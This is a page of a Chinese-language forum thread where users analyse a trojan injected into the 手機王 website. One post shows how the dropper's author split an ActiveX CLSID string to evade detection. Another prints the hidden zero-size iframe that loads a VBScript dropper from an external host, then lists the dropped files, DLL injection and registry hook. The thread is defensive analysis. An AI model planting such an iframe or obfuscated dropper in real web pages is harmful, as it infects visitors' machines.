手機王又被植入木馬了 - 第 2 頁

第 2 頁,共 2 頁 首頁首頁 1 2
顯示結果從第 11 筆 到 12 筆,共計 12 筆
  1. #11
    會員
    註冊日期
    2006-04-08
    所在地區
    ADSL 2M/256
    討論區文章
    36

    回覆: 手機王又被植入木馬了

    引用 作者:hwwgo
    怎麽才能做到還原的?
    該病毒作者將一句話切成很多段,以混淆視聽。


    語法:
     j1="clsid:"
        j2="BD96"
        j3="C556-"
        j4="65A3-"
        j5="11D0-"
        j6="983A-"
        j7="00C04FC29E36"
    等於
    語法:
    j8="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
    等等。

  2. #12
    會員
    註冊日期
    2006-03-29
    所在地區
    12MB
    討論區文章
    248

    不錯 回覆: 手機王又被植入木馬了

    到目前為止都還未修復,而且網站無聯絡電話,真奇怪。

    分析了一下,結果如下:
    1. 首頁有下面的語法:
    <iframe src=http://www.myemage.com/V20/Daren/images/img.html width=0 height=0></iframe>
    2. 下載img.html,它是一個VBScript,如前面有人說明(2.exe就是寫在這個script裡)。
    3. 執行後,系統有下面的行為:
    DLL Injection:
    C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe 注入某些執行程序(如svchost.exe)。
    C:\WINDOWS\system32\gfile.dll注入某些執行程序(如explorer.exe)。

    Drop files:
    C:\Documents and Settings\Administrator\Local Settings\Temp\svchost.exe
    C:\WINDOWS\system32\gfile.dll
    C:\WINDOWS\system32\goodfile.exe

    BHO/CLSID:
    {71177AD5-E5B5-4451-A4B0-F31C521B6557}--C:\WINDOWS\system32\gfile.dll

    Registry:
    HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks||Value={71177AD5-E5B5-4451-A4B0-F31C521B6557}


類似的主題

  1. 【求助】論壇被植入木馬病毒
    作者:eva671117 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 24
    最後發表: 2007-04-27, 10:15 PM
  2. 【警告】手機王網頁又被植入惡意連結
    作者:sai7sai 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 16
    最後發表: 2007-02-24, 10:15 PM
  3. 【警告】Sogi! 手機王--被植入木馬
    作者:hcchen 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 9
    最後發表: 2006-10-29, 11:45 AM
  4. 這網站是不是被植入木馬了啊>.<
    作者:消防小天使 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 1
    最後發表: 2005-06-19, 10:25 PM
  5. 這是被植入木馬嗎?
    作者:chiener 所在討論版:-- 防 駭 / 防 毒 版
    回覆: 0
    最後發表: 2002-04-23, 04:23 PM

 

手機王

發表文章規則

  • 不可以發表新主題
  • 不可以回覆文章
  • 不可以上傳附加檔案
  • 不可以編輯自己的文章
  •